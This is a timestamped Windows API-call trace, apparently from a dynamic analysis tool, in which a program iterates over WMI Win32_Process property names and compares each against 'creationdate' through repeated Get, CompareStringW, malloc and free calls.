[0563.144] IWbemClassObject:Get (in: This=0x364e10, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.144] free (_Block=0x189680)
[0563.144] malloc (_Size=0x18) returned 0x189680
[0563.145] lstrlenW (lpString="InstallDate") returned 11
[0563.145] lstrlenW (lpString="creationdate") returned 12
[0563.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="InstallDate", cchCount2=11) returned 1
[0563.145] free (_Block=0x189680)
[0563.145] IUnknown:Release (This=0x364e10) returned 0x1
[0563.145] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.145] malloc (_Size=0x18) returned 0x189680
[0563.145] IWbemClassObject:Get (in: This=0x365360, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.145] free (_Block=0x189680)
[0563.145] malloc (_Size=0x18) returned 0x189680
[0563.145] IWbemClassObject:Get (in: This=0x365360, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.146] free (_Block=0x189680)
[0563.146] malloc (_Size=0x18) returned 0x189680
[0563.146] lstrlenW (lpString="KernelModeTime") returned 14
[0563.146] lstrlenW (lpString="creationdate") returned 12
[0563.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="KernelModeTime", cchCount2=14) returned 1
[0563.146] free (_Block=0x189680)
[0563.146] IUnknown:Release (This=0x365360) returned 0x1
[0563.146] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.146] malloc (_Size=0x18) returned 0x189680
[0563.146] IWbemClassObject:Get (in: This=0x365610, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.147] free (_Block=0x189680)
[0563.147] malloc (_Size=0x18) returned 0x189680
[0563.147] IWbemClassObject:Get (in: This=0x365610, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.147] free (_Block=0x189680)
[0563.147] malloc (_Size=0x18) returned 0x189680
[0563.147] lstrlenW (lpString="MaximumWorkingSetSize") returned 21
[0563.147] lstrlenW (lpString="creationdate") returned 12
[0563.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="MaximumWorkingSetSize", cchCount2=21) returned 1
[0563.148] free (_Block=0x189680)
[0563.148] IUnknown:Release (This=0x365610) returned 0x1
[0563.148] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.148] malloc (_Size=0x18) returned 0x189680
[0563.148] IWbemClassObject:Get (in: This=0x3658c0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.148] free (_Block=0x189680)
[0563.148] malloc (_Size=0x18) returned 0x189680
[0563.148] IWbemClassObject:Get (in: This=0x3658c0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.148] free (_Block=0x189680)
[0563.148] malloc (_Size=0x18) returned 0x189680
[0563.149] lstrlenW (lpString="MinimumWorkingSetSize") returned 21
[0563.149] lstrlenW (lpString="creationdate") returned 12
[0563.149] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="MinimumWorkingSetSize", cchCount2=21) returned 1
[0563.149] free (_Block=0x189680)
[0563.149] IUnknown:Release (This=0x3658c0) returned 0x1
[0563.149] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.149] malloc (_Size=0x18) returned 0x189680
[0563.149] IWbemClassObject:Get (in: This=0x365b70, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.149] free (_Block=0x189680)
[0563.149] malloc (_Size=0x18) returned 0x189680
[0563.149] IWbemClassObject:Get (in: This=0x365b70, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.150] free (_Block=0x189680)
[0563.150] malloc (_Size=0x18) returned 0x189680
[0563.150] lstrlenW (lpString="Name") returned 4
[0563.150] lstrlenW (lpString="creationdate") returned 12
[0563.150] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Name", cchCount2=4) returned 1
[0563.150] free (_Block=0x189680)
[0563.150] IUnknown:Release (This=0x365b70) returned 0x1
[0563.150] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.150] malloc (_Size=0x18) returned 0x189680
[0563.150] IWbemClassObject:Get (in: This=0x365e20, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.150] free (_Block=0x189680)
[0563.150] malloc (_Size=0x18) returned 0x189680
[0563.150] IWbemClassObject:Get (in: This=0x365e20, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.151] free (_Block=0x189680)
[0563.151] malloc (_Size=0x18) returned 0x189680
[0563.151] lstrlenW (lpString="OSName") returned 6
[0563.151] lstrlenW (lpString="creationdate") returned 12
[0563.151] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="OSName", cchCount2=6) returned 1
[0563.151] free (_Block=0x189680)
[0563.151] IUnknown:Release (This=0x365e20) returned 0x1
[0563.151] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.151] malloc (_Size=0x18) returned 0x189680
[0563.151] IWbemClassObject:Get (in: This=0x3660d0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.151] free (_Block=0x189680)
[0563.152] malloc (_Size=0x18) returned 0x189680
[0563.152] IWbemClassObject:Get (in: This=0x3660d0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.152] free (_Block=0x189680)
[0563.152] malloc (_Size=0x18) returned 0x189680
[0563.152] lstrlenW (lpString="OtherOperationCount") returned 19
[0563.152] lstrlenW (lpString="creationdate") returned 12
[0563.152] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="OtherOperationCount", cchCount2=19) returned 1
[0563.152] free (_Block=0x189680)
[0563.152] IUnknown:Release (This=0x3660d0) returned 0x1
[0563.153] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.153] malloc (_Size=0x18) returned 0x189680
[0563.153] IWbemClassObject:Get (in: This=0x366380, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.153] free (_Block=0x189680)
[0563.153] malloc (_Size=0x18) returned 0x189680
[0563.153] IWbemClassObject:Get (in: This=0x366380, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.153] free (_Block=0x189680)
[0563.153] malloc (_Size=0x18) returned 0x189680
[0563.154] lstrlenW (lpString="OtherTransferCount") returned 18
[0563.154] lstrlenW (lpString="creationdate") returned 12
[0563.154] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="OtherTransferCount", cchCount2=18) returned 1
[0563.154] free (_Block=0x189680)
[0563.154] IUnknown:Release (This=0x366380) returned 0x1
[0563.154] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.154] malloc (_Size=0x18) returned 0x189680
[0563.154] IWbemClassObject:Get (in: This=0x366630, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.155] free (_Block=0x189680)
[0563.155] malloc (_Size=0x18) returned 0x189680
[0563.155] IWbemClassObject:Get (in: This=0x366630, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.155] free (_Block=0x189680)
[0563.155] malloc (_Size=0x18) returned 0x189680
[0563.155] lstrlenW (lpString="PageFaults") returned 10
[0563.155] lstrlenW (lpString="creationdate") returned 12
[0563.156] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PageFaults", cchCount2=10) returned 1
[0563.156] free (_Block=0x189680)
[0563.156] IUnknown:Release (This=0x366630) returned 0x1
[0563.156] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.156] malloc (_Size=0x18) returned 0x189680
[0563.156] IWbemClassObject:Get (in: This=0x3668e0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.156] free (_Block=0x189680)
[0563.156] malloc (_Size=0x18) returned 0x189680
[0563.156] IWbemClassObject:Get (in: This=0x3668e0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.157] free (_Block=0x189680)
[0563.157] malloc (_Size=0x18) returned 0x189680
[0563.157] lstrlenW (lpString="PageFileUsage") returned 13
[0563.157] lstrlenW (lpString="creationdate") returned 12
[0563.157] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PageFileUsage", cchCount2=13) returned 1
[0563.157] free (_Block=0x189680)
[0563.157] IUnknown:Release (This=0x3668e0) returned 0x1
[0563.157] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.157] malloc (_Size=0x18) returned 0x189680
[0563.157] IWbemClassObject:Get (in: This=0x366b90, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.158] free (_Block=0x189680)
[0563.158] malloc (_Size=0x18) returned 0x189680
[0563.158] IWbemClassObject:Get (in: This=0x366b90, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.158] free (_Block=0x189680)
[0563.158] malloc (_Size=0x18) returned 0x189680
[0563.158] lstrlenW (lpString="ParentProcessId") returned 15
[0563.158] lstrlenW (lpString="creationdate") returned 12
[0563.158] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ParentProcessId", cchCount2=15) returned 1
[0563.159] free (_Block=0x189680)
[0563.159] IUnknown:Release (This=0x366b90) returned 0x1
[0563.159] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.159] malloc (_Size=0x18) returned 0x189680
[0563.159] IWbemClassObject:Get (in: This=0x366e40, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.159] free (_Block=0x189680)
[0563.159] malloc (_Size=0x18) returned 0x189680
[0563.159] IWbemClassObject:Get (in: This=0x366e40, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.159] free (_Block=0x189680)
[0563.159] malloc (_Size=0x18) returned 0x189680
[0563.160] lstrlenW (lpString="PeakPageFileUsage") returned 17
[0563.160] lstrlenW (lpString="creationdate") returned 12
[0563.160] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PeakPageFileUsage", cchCount2=17) returned 1
[0563.160] free (_Block=0x189680)
[0563.160] IUnknown:Release (This=0x366e40) returned 0x1
[0563.160] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.160] malloc (_Size=0x18) returned 0x189680
[0563.160] IWbemClassObject:Get (in: This=0x3670f0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.160] free (_Block=0x189680)
[0563.161] malloc (_Size=0x18) returned 0x189680
[0563.161] IWbemClassObject:Get (in: This=0x3670f0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.161] free (_Block=0x189680)
[0563.161] malloc (_Size=0x18) returned 0x189680
[0563.161] lstrlenW (lpString="PeakVirtualSize") returned 15
[0563.161] lstrlenW (lpString="creationdate") returned 12
[0563.161] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PeakVirtualSize", cchCount2=15) returned 1
[0563.161] free (_Block=0x189680)
[0563.161] IUnknown:Release (This=0x3670f0) returned 0x1
[0563.161] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.162] malloc (_Size=0x18) returned 0x189680
[0563.162] IWbemClassObject:Get (in: This=0x3673a0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.162] free (_Block=0x189680)
[0563.162] malloc (_Size=0x18) returned 0x189680
[0563.162] IWbemClassObject:Get (in: This=0x3673a0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.162] free (_Block=0x189680)
[0563.162] malloc (_Size=0x18) returned 0x189680
[0563.162] lstrlenW (lpString="PeakWorkingSetSize") returned 18
[0563.162] lstrlenW (lpString="creationdate") returned 12
[0563.163] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PeakWorkingSetSize", cchCount2=18) returned 1
[0563.163] free (_Block=0x189680)
[0563.163] IUnknown:Release (This=0x3673a0) returned 0x1
[0563.163] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.163] malloc (_Size=0x18) returned 0x189680
[0563.163] IWbemClassObject:Get (in: This=0x367650, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.163] free (_Block=0x189680)
[0563.163] malloc (_Size=0x18) returned 0x189680
[0563.163] IWbemClassObject:Get (in: This=0x367650, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.163] free (_Block=0x189680)
[0563.163] malloc (_Size=0x18) returned 0x189680
[0563.163] lstrlenW (lpString="Priority") returned 8
[0563.164] lstrlenW (lpString="creationdate") returned 12
[0563.164] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Priority", cchCount2=8) returned 1
[0563.164] free (_Block=0x189680)
[0563.164] IUnknown:Release (This=0x367650) returned 0x1
[0563.164] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.164] malloc (_Size=0x18) returned 0x189680
[0563.164] IWbemClassObject:Get (in: This=0x367900, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.164] free (_Block=0x189680)
[0563.164] malloc (_Size=0x18) returned 0x189680
[0563.164] IWbemClassObject:Get (in: This=0x367900, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.164] free (_Block=0x189680)
[0563.164] malloc (_Size=0x18) returned 0x189680
[0563.165] lstrlenW (lpString="PrivatePageCount") returned 16
[0563.165] lstrlenW (lpString="creationdate") returned 12
[0563.165] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PrivatePageCount", cchCount2=16) returned 1
[0563.165] free (_Block=0x189680)
[0563.165] IUnknown:Release (This=0x367900) returned 0x1
[0563.165] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.165] malloc (_Size=0x18) returned 0x189680
[0563.165] IWbemClassObject:Get (in: This=0x367bb0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.165] free (_Block=0x189680)
[0563.165] malloc (_Size=0x18) returned 0x189680
[0563.165] IWbemClassObject:Get (in: This=0x367bb0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.166] free (_Block=0x189680)
[0563.166] malloc (_Size=0x18) returned 0x189680
[0563.166] lstrlenW (lpString="ProcessId") returned 9
[0563.166] lstrlenW (lpString="creationdate") returned 12
[0563.166] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ProcessId", cchCount2=9) returned 1
[0563.166] free (_Block=0x189680)
[0563.166] IUnknown:Release (This=0x367bb0) returned 0x1
[0563.166] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.166] malloc (_Size=0x18) returned 0x189680
[0563.166] IWbemClassObject:Get (in: This=0x367e60, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.167] free (_Block=0x189680)
[0563.167] malloc (_Size=0x18) returned 0x189680
[0563.167] IWbemClassObject:Get (in: This=0x367e60, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.167] free (_Block=0x189680)
[0563.167] malloc (_Size=0x18) returned 0x189680
[0563.167] lstrlenW (lpString="QuotaNonPagedPoolUsage") returned 22
[0563.167] lstrlenW (lpString="creationdate") returned 12
[0563.167] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaNonPagedPoolUsage", cchCount2=22) returned 1
[0563.167] free (_Block=0x189680)
[0563.168] IUnknown:Release (This=0x367e60) returned 0x1
[0563.168] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.168] malloc (_Size=0x18) returned 0x189680
